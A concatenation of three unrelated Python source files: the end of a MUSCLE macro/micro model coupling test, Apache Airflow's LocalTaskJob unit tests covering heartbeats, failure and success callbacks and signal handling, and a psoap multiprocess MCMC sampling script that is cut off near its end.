assert msg.data['test_grid'].array.dtype.itemsize == 8
assert msg.data['test_grid'].array[0][1] == 2
assert msg.timestamp == i * 10.0
@skip_if_python_only
def test_cpp_macro_micro(mmp_server_process_simple):
# create C++ micro model
# see libmuscle/cpp/src/libmuscle/tests/micro_model_test.cpp
cpp_build_dir = Path(__file__).parents[1] / 'libmuscle' / 'cpp' / 'build'
lib_paths = [
cpp_build_dir / 'grpc' / 'c-ares' / 'c-ares' / 'lib',
cpp_build_dir / 'grpc' / 'zlib' / 'zlib' / 'lib',
cpp_build_dir / 'grpc' / 'openssl' / 'openssl' / 'lib',
cpp_build_dir / 'protobuf' / 'protobuf' / 'lib',
cpp_build_dir / 'grpc' / 'grpc' / 'lib',
cpp_build_dir / 'msgpack' / 'msgpack' / 'lib']
env = {
'LD_LIBRARY_PATH': ':'.join(map(str, lib_paths))}
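# LD_LIBRARY_PATH points the C++ test binary at the shared libraries built in-tree
# (gRPC, protobuf, msgpack, etc.) so it can run without a system-wide install.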
cpp_test_dir = cpp_build_dir / 'libmuscle' / 'tests'
cpp_test_micro = cpp_test_dir / 'micro_model_test'
micro_result = subprocess.Popen(
[str(cpp_test_micro), '--muscle-instance=micro'], env=env)
# run macro model
macro_process = mp.Process(target=run_macro, args=('macro',))
macro_process.start()
# check results
micro_result.wait()
assert micro_result.returncode == 0
macro_process.join()
assert macro_process.exitcode == 0
|
test_local_task_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import signal
import time
import unittest
import uuid
from multiprocessing import Lock, Value
from unittest import mock
from unittest.mock import patch
import pytest
from parameterized import parameterized
from airflow import settings
from airflow.exceptions import AirflowException, AirflowFailException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models.dag import DAG, DagModel
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_jobs, clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
# pylint: skip-file
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_jobs()
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def tearDown(self) -> None:
clear_db_jobs()
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}
)
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(
run_id="test", state=State.SUCCESS, execution_date=DEFAULT_DATE, start_date=DEFAULT_DATE
)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
assert all(check_result_1)
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
assert all(check_result_2)
def test_localtaskjob_heartbeat(self):
session = settings.Session()
dag = DAG('test_localtaskjob_heartbeat', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
with pytest.raises(AirflowException):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
assert ti.pid != os.getpid()
job1.heartbeat_callback(session=None)
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException):
job1.heartbeat_callback()
@mock.patch('airflow.jobs.local_task_job.psutil')
def test_localtaskjob_heartbeat_with_run_as_user(self, psutil_mock):
session = settings.Session()
dag = DAG('test_localtaskjob_heartbeat', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1', run_as_user='myuser')
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.pid = 2
ti.hostname = get_hostname()
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
job1.task_runner.process.pid = 2
# Here, ti.pid is 2, the parent process of ti.pid is a mock(different).
# And task_runner process is 2. Should fail
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
# We make the parent process of ti.pid to equal the task_runner process id
psutil_mock.Process.return_value.ppid.return_value = 1
ti.state = State.RUNNING
ti.pid = 2
# The task_runner process id is 1, same as the parent process of ti.pid
# as seen above
assert ti.run_as_user
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
# Here the task_runner process id is changed to 2
# while parent process of ti.pid is kept at 1, which is different
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
def test_heartbeat_failed_fast(self):
"""
Test that task heartbeat will sleep when it fails fast
"""
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(
run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
assert len(heartbeat_records) > 2
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
# Assert that difference small enough
delta = (time2 - time1).total_seconds()
assert abs(delta - job.heartrate) < 0.5
@pytest.mark.quarantined
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
assert State.RUNNING == ti.state
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
assert not process.is_alive()
ti.refresh_from_db()
assert State.SUCCESS == ti.state
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
assert ti.pid == 1
assert ti.state == State.RUNNING
session.close()
@pytest.mark.quarantined
def test_localtaskjob_maintain_heart_rate(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
assert mock_start.call_count == 1
assert mock_ret_code.call_count == 2
time_end = time.time()
assert self.mock_base_job_sleep.call_count == 1
assert job1.state == State.SUCCESS
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
assert time_end - time_start < job1.heartrate
session.close()
def test_mark_failure_on_failure_callback(self):
"""
Test that ensures that mark_failure in the UI fails
the task, and executes on_failure_callback
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
def check_failure(context):
with failure_callback_called.get_lock():
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure'
assert context['exception'] == "task marked as failed externally"
def task_function(ti):
with create_session() as session:
assert State.RUNNING == ti.state
ti.log.info("Marking TI as failed 'externally'")
ti.state = State.FAILED
session.merge(ti)
session.commit()
time.sleep(10)
# This should not happen -- the state change should be noticed and the task should get killed
with task_terminated_externally.get_lock():
task_terminated_externally.value = 0
with DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE) as dag:
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_failure_callback=check_failure,
)
dag.clear()
with create_session() as session:
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
with timeout(30):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
assert ti.state == State.FAILED
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
@patch('airflow.utils.process_utils.subprocess.check_call')
@patch.object(StandardTaskRunner, 'return_code')
def test_failure_callback_only_called_once(self, mock_return_code, _check_call):
"""
Test that ensures that when a task exits with failure by itself,
failure callback is only called once
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
callback_count_lock = Lock()
def failure_callback(context):
with callback_count_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_failure_callback_race'
assert isinstance(context['exception'], AirflowFailException)
def task_function(ti):
raise AirflowFailException()
dag = DAG(dag_id='test_failure_callback_race', start_date=DEFAULT_DATE)
task = PythonOperator(
task_id='test_exit_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
dag=dag,
)
dag.clear()
with create_session() as session:
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Simulate race condition where job1 heartbeat ran right after task
# state got set to failed by ti.handle_failure but before task process
# fully exits. See _execute loop in airflow/jobs/local_task_job.py.
# In this case, we have:
# * task_runner.return_code() is None
# * ti.state == State.Failed
#
# We also need to set return_code to a valid int after job1.terminating
# is set to True so _execute loop won't loop forever.
def dummy_return_code(*args, **kwargs):
return None if not job1.terminating else -9
mock_return_code.side_effect = dummy_return_code
with timeout(10):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
assert ti.state == State.FAILED # task exits with failure state
assert failure_callback_called.value == 1
@pytest.mark.quarantined
def test_mark_success_on_success_callback(self):
"""
Test that ensures that where a task is marked success in the UI
on_success_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
success_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def success_callback(context):
with shared_mem_lock:
success_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_success'
dag = DAG(dag_id='test_mark_success', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_success_callback=success_callback,
dag=dag,
)
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 25):
ti.refresh_from_db()
if ti.state == State.RUNNING:
break
time.sleep(0.2)
assert ti.state == State.RUNNING
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
assert success_callback_called.value == 1
assert task_terminated_externally.value == 1
assert not process.is_alive()
@parameterized.expand(
[
(signal.SIGTERM,),
(signal.SIGKILL,),
]
)
def test_process_kill_calls_on_failure_callback(self, signal_type):
"""
Test that ensures that when a task is killed with sigterm or sigkill
on_failure_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def failure_callback(context):
with shared_mem_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure'
dag = DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
task = PythonOperator(
task_id='test_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
dag=dag,
)
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 20):
ti.refresh_from_db()
if ti.state == State.RUNNING and ti.pid is not None:
break
time.sleep(0.2)
assert ti.state == State.RUNNING
assert ti.pid is not None
os.kill(ti.pid, signal_type)
process.join(timeout=10)
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
assert not process.is_alive()
def test_task_exit_should_update_state_of_finished_dagruns_with_dag_paused(self):
"""Test that with DAG paused, DagRun state will update when the tasks finishes the run"""
dag = DAG(dag_id='test_dags', start_date=DEFAULT_DATE)
op1 = PythonOperator(task_id='dummy', dag=dag, owner='airflow', python_callable=lambda: True)
session = settings.Session()
orm_dag = DagModel(
dag_id=dag.dag_id,
has_task_concurrency_limits=False,
next_dagrun=dag.start_date,
next_dagrun_create_after=dag.following_schedule(DEFAULT_DATE),
is_active=True,
is_paused=True,
)
session.add(orm_dag)
session.flush()
# Write Dag to DB
dagbag = DagBag(dag_folder="/dev/null", include_examples=False, read_dags_from_db=False)
dagbag.bag_dag(dag, root_dag=dag)
dagbag.sync_to_db()
dr = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
assert dr.state == State.RUNNING
ti = TaskInstance(op1, dr.execution_date)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
job1.run()
session.add(dr)
session.refresh(dr)
assert dr.state == State.SUCCESS
@pytest.fixture()
def clean_db_helper():
yield
clear_db_jobs()
clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
@pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]]) # type: ignore
@mock.patch("airflow.jobs.local_task_job.get_task_runner")
def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes):
unique_prefix = str(uuid.uuid4())
dag = DAG(dag_id=f'{unique_prefix}_test_number_of_queries', start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_state_succeeded1', dag=dag)
dag.clear()
dag.create_dagrun(run_id=unique_prefix, execution_date=DEFAULT_DATE, state=State.NONE)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        mock_get_task_runner.return_value.return_code.side_effect = return_codes
job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
with assert_queries_count(16):
job.run()
|
sample_parallel.py
|
import argparse
parser = argparse.ArgumentParser(description="Sample the distribution across multiple chunks.")
parser.add_argument("run_index", type=int, default=0, help="Which output subdirectory to save this particular run, in the case you may be running multiple concurrently.")
parser.add_argument("--debug", action="store_true", help="Print out debug commands to log.log")
args = parser.parse_args()
import yaml
from functools import partial
try:
f = open("config.yaml")
    config = yaml.safe_load(f)
f.close()
except FileNotFoundError as e:
print("You need to copy a config.yaml file to this directory, and then edit the values to your particular case.")
raise
from multiprocessing import Process, Pipe
import os
import numpy as np
from astropy.io import ascii
# from psoap.samplers import StateSampler
import psoap.constants as C
from psoap.data import Chunk, lredshift, replicate_wls
from psoap import utils
from psoap import orbit
from psoap import covariance
from scipy.linalg import cho_factor, cho_solve
from numpy.linalg import slogdet
import gc
import logging
from itertools import chain
from collections import deque
from operator import itemgetter
import shutil
# Create an output directory to store the samples from this run
run_index = args.run_index
routdir = config["outdir"] + "/run{:0>2}/".format(run_index)
if os.path.exists(routdir):
print("Deleting", routdir)
shutil.rmtree(routdir)
print("Creating ", routdir)
os.makedirs(routdir)
# Copy yaml file from current working directory to routdir for archiving purposes
shutil.copy("config.yaml", routdir + "config.yaml")
# When running a hierarchical model, we'll need to do this.
# # Create subdirectories
# for model_number in range(len(Starfish.data["files"])):
# for order in Starfish.data["orders"]:
# order_dir = routdir + Starfish.specfmt.format(model_number, order)
# print("Creating ", order_dir)
# os.makedirs(order_dir)
# Load the list of chunks
chunks = ascii.read(config["chunk_file"])
print("Sampling the following chunks of data, one chunk per core.")
print(chunks)
n_chunks = len(chunks)
# list of keys from 0 to (norders - 1)
chunk_keys = np.arange(n_chunks)
# Load data and apply masks
chunk_data = []
for chunk in chunks:
order, wl0, wl1 = chunk
chunkSpec = Chunk.open(order, wl0, wl1, limit=config["epoch_limit"])
chunkSpec.apply_mask()
chunk_data.append(chunkSpec)
# The name of the model
model = config["model"]
pars = config["parameters"]
# Set up the logger
if args.debug:
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", filename="{}log.log".format(routdir), level=logging.DEBUG, filemode="w", datefmt='%m/%d/%Y %I:%M:%S %p')
# Create a partial function which maps a vector of floats to parameters
convert_vector_p = partial(utils.convert_vector, model=model, fix_params=config["fix_params"], **pars)
def info(title):
'''
Print process information useful for debugging.
'''
print(title)
print('module name:', __name__)
if hasattr(os, 'getppid'): # only available on Unix
print('parent process:', os.getppid())
print('process id:', os.getpid())
class Worker:
def __init__(self, debug=False):
'''
This object contains all of the variables necessary for the partial
lnprob calculation for one chunk. It is designed to first be
        instantiated within the main process and then forked to other
        subprocesses. Once operating in the subprocess, the variables specific
        to the chunk are loaded with an `INIT` message call, which tells
        `self.initialize()` which chunk key to load.
'''
# Choose which lnprob we will be using based off of the model type
# lnprobs = {"SB1":self.lnprob_SB1, "SB2":self.lnprob_SB2, "ST3":self.lnprob_ST3}
# self.lnprob = lnprobs[model]
# The list of possible function calls we can make.
self.func_dict = {"INIT": self.initialize,
"LNPROB": self.lnprob,
"FINISH": self.finish
}
self.debug = debug
if args.debug:
self.logger = logging.getLogger("{}".format(self.__class__.__name__))
def initialize(self, key):
'''
Initialize to the correct chunk of data.
        :param key: index of the chunk of data to initialize on
        :type key: int
This method should only be called after all subprocess have been forked.
'''
self.key = key
# Load the proper chunk
data = chunk_data[self.key]
self.lwl = data.lwl
self.fl = data.fl
self.sigma = data.sigma * config["soften"]
self.date = data.date
        # The mask was already applied in the loading step; it is kept here to
        # transform velocity shifts, which are evaluated off of self.date1D.
self.mask = data.mask
self.date1D = data.date1D
# Total number of wavelength points (after applying mask)
self.N = data.N
if args.debug:
self.logger = logging.getLogger("{} {}".format(self.__class__.__name__, self.key))
if self.debug:
self.logger.setLevel(logging.DEBUG)
else:
self.logger.setLevel(logging.INFO)
self.logger.info("Initializing model on chunk {}.".format(self.key))
# Set up temporary holders for V11 matrix.
# self.N is the length of the masked, flattened wl vector.
self.V11 = np.empty((self.N, self.N), dtype=np.float64)
# Create an orbit
self.orb = orbit.models[model](**pars, obs_dates=self.date1D)
def lnprob(self, p):
'''
Unified lnprob interface.
Args:
p (np.float): vector containing the model parameters
Returns:
float : the lnlikelihood of the model parameters.
'''
# separate the parameters into orbital and GP based upon the model type
# also backfill any parameters that we have fixed for this analysis
p_orb, p_GP = convert_vector_p(p)
velocities = orbit.models[model](*p_orb, self.date1D).get_velocities()
# Make sure none are faster than speed of light
if np.any(np.abs(np.array(velocities)) >= C.c_kms):
return -np.inf
# Get shifted wavelengths
lwls = replicate_wls(self.lwl, velocities, self.mask)
# Feed velocities and GP parameters to fill out covariance matrix appropriate for this model
lnp = covariance.lnlike[model](self.V11, *lwls, self.fl, self.sigma, *p_GP)
# lnp = covariance.lnlike_f_g_george(*lwls, self.fl, self.sigma, *p_GP)
gc.collect()
return lnp
def finish(self, *args):
'''
Wrap up the sampling and write the samples to disk.
'''
pass
def brain(self, conn):
'''
The infinite loop of the subprocess, which continues to listen for
messages on the pipe.
'''
self.conn = conn
alive = True
while alive:
#Keep listening for messages put on the Pipe
alive = self.interpret()
#Once self.interpret() returns `False`, this loop will die.
self.conn.send("DEAD")
def interpret(self):
'''
Interpret the messages being put into the Pipe, and do something with
them. Messages are always sent in a 2-arg tuple (fname, arg)
Right now we only expect one function and one argument but this could
        be generalized to *args.
'''
# info("brain")
fname, arg = self.conn.recv() # Waits here to receive a new message
if args.debug:
self.logger.debug("{} received message {}".format(os.getpid(), (fname, arg)))
func = self.func_dict.get(fname, False)
if func:
response = func(arg)
else:
if args.debug:
self.logger.info("Given an unknown function {}, assuming kill signal.".format(fname))
return False
# Functions only return a response other than None when they want them
# communicated back to the master process.
# Some commands sent to the child processes do not require a response
# to the main process.
if response:
if args.debug:
self.logger.debug("{} sending back {}".format(os.getpid(), response))
self.conn.send(response)
return True
# Moving forward, we have the option to subclass Worker if we want to alter routines.
# We create one Worker in the main process. When the process forks, each
# subprocess now has its own independent Worker instance.
# Then, each forked model will be customized using an INIT command passed
# through the PIPE.
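# A minimal sketch of the parent-side message protocol (values are hypothetical):
#
#   pconn.send(("INIT", 3))       # child loads chunk_data[3]
#   pconn.send(("LNPROB", p))     # child evaluates lnprob(p) for its chunk
#   lnp = pconn.recv()            # float sent back by Worker.interpret()
#   pconn.send(("FINISH", None))  # wrap up; an unknown command acts as a kill signal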
def initialize(worker):
# Fork a subprocess for each key: (spectra, order)
pconns = {} # Parent connections
cconns = {} # Child connections
ps = {} # Process objects
# Create all of the pipes
for key in chunk_keys:
pconn, cconn = Pipe()
pconns[key], cconns[key] = pconn, cconn
p = Process(target=worker.brain, args=(cconn,))
p.start()
ps[key] = p
# print("created keys", chunk_keys)
# print("conns", pconns, cconns)
# initialize each Model to a specific chunk
for key, pconn in pconns.items():
pconn.send(("INIT", key))
return (pconns, cconns, ps)
def profile_code():
'''
Test hook designed to be used by cprofile or kernprof. Does not include any
network latency from communicating or synchronizing between processes
because we run on just one process.
'''
#Evaluate one complete iteration from delivery of stellar parameters from master process
#Master proposal
# stellar_Starting.update({"logg":4.29})
# model.stellar_lnprob(stellar_Starting)
#Assume we accepted
# model.decide_stellar(True)
#Right now, assumes Kurucz order 23
pass
def test():
# Uncomment these lines to profile
# #Initialize the current model for profiling purposes
# model.initialize((0, 0))
# import cProfile
# cProfile.run("profile_code()", "prof")
# import sys; sys.exit()
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
import sys;sys.exit()
# All subprocesses will inherit pipe file descriptors created in the master process.
# http://www.pushingbits.net/posts/python-multiprocessing-with-pipes/
# thus, to really close a pipe, you need to close it in every subprocess.
# Create the main sampling loop, which will sample the theta parameters across all chunks
worker = Worker(debug=True)
# Now that the different processes have been forked, initialize them
pconns, cconns, ps = initialize(worker)
def prior_SB1(p):
(K, e, omega, P, T0, gamma), (amp_f, l_f) = convert_vector_p(p)
if K < 0.0 or e < 0.0 or e > 1.0 or P < 0.0 or omega < -90 or omega > 450 or amp_f < 0.0 or l_f < 0.0:
return -np.inf
else:
return 0.0
def prior_SB2(p):
(q, K, e, omega, P, T0, gamma), (amp_f, l_f, amp_g, l_g) = convert_vector_p(p)
if q < 0.0 or K < 0.0 or e < 0.0 or e > 1.0 or P < 0.0 or omega < -90 or omega > 450 or amp_f < 0.0 or l_f < 0.0 or amp_g < 0.0 or l_g < 0.0:
return -np.inf
else:
return 0.0
def prior_ST3(p):
(q_in, K_in, e_in, omega_in, P_in, T0_in, q_out, K_out, e_out, omega_out, P_out, T0_out, gamma), (amp_f, l_f, amp_g, l_g, amp_h, l_h) = convert_vector_p(p)
if q_in < 0.0 or K_in < 0.0 or e_in < 0.0 or e_in > 1.0 or P_in < 0.0 or omega_in < -90 or omega_in > 450 or q_out < 0.0 or K_out < 0.0 or e_out < 0.0 or e_out > 1.0 or P_out < 0.0 or omega_out < -90 or omega_out > 450 or amp_f < 0.0 or l_f < 0.0 or amp_g < 0.0 or l_g < 0.0 or amp_h < 0.0 or l_h < 0.0:
return -np.inf
else:
return 0.0
# Optionally load a user-defined prior.
# Check if a file named "prior.py" exists in the local folder
# If so, import it
try:
from prior import prior
print("Loaded user defined prior.")
except ImportError:
    print("Using default prior.")
    # Set the default priors.
    priors = {"SB1": prior_SB1, "SB2": prior_SB2, "ST3": prior_ST3}
    prior = priors[model]
def lnprob(p):
lnprior = prior(p)
if lnprior == -np.inf:
return -np.inf
#Distribute the calculation, one chunk to each process
for (key, pconn) in pconns.items():
pconn.send(("LNPROB", p))
#Collect the answer from each process
lnps = np.empty(n_chunks)
for i, pconn in enumerate(pconns.values()):
lnps[i] = pconn.recv()
# Calculate the summed lnprob
s = np.sum(lnps)
    # Add the prior to the total
return s + lnprior
print("Defined lnprob")
# Import the Metropolis-Hastings sampler to do the sampling over the top-level parameters
from emcee import MHSampler
print("Imported emcee")
# Determine how many parameters we will actually be fitting
# The difference between all of the parameters and the parameters we will be fixing
dim = len(utils.registered_params[model]) - len(config["fix_params"])
# Read in starting parameters
p0 = utils.convert_dict(model, config["fix_params"], **pars)
# To check feasibility, evaluate the starting position. If this evaluates to -np.inf, then just
# exit, since we might be wasting our time evaluating the rest.
print("Trying first evaluation")
lnp0 = lnprob(p0)
if lnp0 == -np.inf:
print("Starting position for Markov Chain evaluates to -np.inf")
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
